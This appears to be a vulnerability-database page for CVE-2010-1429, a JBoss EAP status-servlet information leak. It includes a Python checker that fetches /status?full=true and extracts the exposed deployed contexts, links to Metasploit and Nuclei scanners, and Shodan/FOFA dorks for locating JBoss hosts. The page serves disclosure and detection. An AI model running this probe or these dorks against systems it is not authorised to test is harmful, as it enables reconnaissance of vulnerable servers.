CVE-2010-1429
NUCLEI · Red Hat JBoss EAP <4.2.0.CP09 and <4.3.0.CP08 - Info Disclosure
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
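Added example, not part of this advisory, the Metasploit module or the Nuclei template listed below: a small offline-testable checker for the leak described above. It requests the status servlet with the full=true query string the advisory names and parses the deployed web contexts out of the reply. Assumptions not stated on the page: the servlet is mounted at /status, a vulnerable host answers 200 with an HTML page that lists each deployed context as an <h1>host/context</h1> heading after an "Application list" heading (the layout of the constructed sample below), and a fixed host answers with a non-200 status or a page without that listing.

```python
"""Added example for CVE-2010-1429 (not the page's own code).

Assumed, not taken from the advisory: the status servlet path (/status)
and the shape of its HTML output. The sample responses below are
constructed for this example.
"""
import re
import sys
import urllib.error
import urllib.request

STATUS_PATH = "/status"      # assumed servlet path
QUERY = "full=true"          # query string named in the advisory

# Constructed sample of a vulnerable response (layout assumed).
SAMPLE_VULNERABLE = """<html><body>
<h1>JVM</h1><p>Free memory: 12345 KB</p>
<h1>Application list</h1>
<h1>localhost/jmx-console</h1>
<p>Startup time: 12 ms</p>
<h1>localhost/web-console</h1>
<h1>localhost/invoker</h1>
<h1>localhost/myapp</h1>
</body></html>"""

# Constructed sample of a fixed host: no application listing at all.
SAMPLE_PATCHED = "<html><body><h1>403 Forbidden</h1></body></html>"

HEADING = re.compile(r"<h1>\s*([^<]+?)\s*</h1>", re.I)


def extract_contexts(html):
    """Return the context paths (e.g. '/jmx-console') listed after the
    'Application list' heading, or [] when no such listing is present."""
    headings = [h.strip() for h in HEADING.findall(html)]
    try:
        start = [h.lower() for h in headings].index("application list") + 1
    except ValueError:
        return []
    contexts = []
    for heading in headings[start:]:
        # Entries are assumed to read host/context; keep '/context'.
        slash = heading.find("/")
        if slash == -1:
            continue
        contexts.append(heading[slash:])
    return contexts


def classify(status, body):
    """Turn an HTTP status and body into a verdict string."""
    if status != 200:
        return "not vulnerable (status servlet did not answer 200)"
    contexts = extract_contexts(body)
    if contexts:
        return "VULNERABLE: %d deployed contexts exposed" % len(contexts)
    return "not vulnerable (no application listing in response)"


def check_target(base_url, timeout=5):
    """Live check of base_url (e.g. http://host:8080); returns (verdict, contexts)."""
    url = base_url.rstrip("/") + STATUS_PATH + "?" + QUERY
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, ""
    return classify(status, body), extract_contexts(body)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        verdict, ctx = check_target(sys.argv[1])
        print(verdict)
        for c in ctx:
            print("  ", c)
    else:
        # Offline run over the constructed samples.
        print(classify(200, SAMPLE_VULNERABLE), extract_contexts(SAMPLE_VULNERABLE))
        print(classify(200, SAMPLE_PATCHED))
```

Run it with no arguments to exercise the constructed samples, or with a base URL to probe a host you are authorized to test. A non-200 answer is treated as not vulnerable because the fix for the CVE-2008-3273 regression is to put the servlet back behind authentication rather than to change its output; a 200 page with no listing is reported separately so a differently configured servlet is not mistaken for a patched one.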
Exploits (1)
metasploit
SCANNER
by Tyler Krpata, Zach Grace <@ztgrace> · rubypoc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/jboss_vulnscan.rb
Nuclei Templates (1)
Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure
MEDIUM · VERIFIED · by R12W4N
Shodan:
title:"JBoss" || cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" || http.title:"jboss"
FOFA:
title="jboss"
Scores
EPSS
0.2736
EPSS Percentile
96.4%
Details
CWE
CWE-264
Status
published
Products (6)
redhat/jboss_enterprise_application_platform
4.2
redhat/jboss_enterprise_application_platform
4.2.0 cp01 (7 CPE variants)
redhat/jboss_enterprise_application_platform
4.3
redhat/jboss_enterprise_application_platform
4.3.0 cp01 (6 CPE variants)
redhat/jboss_enterprise_application_platform
< 4.2.0
redhat/jboss_enterprise_application_platform
< 4.3.0
Published
Apr 28, 2010
Tracked Since
Feb 18, 2026